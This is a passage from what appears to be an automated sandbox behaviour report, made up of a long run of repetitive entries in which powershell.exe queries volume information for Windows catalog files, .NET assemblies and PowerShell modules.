Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
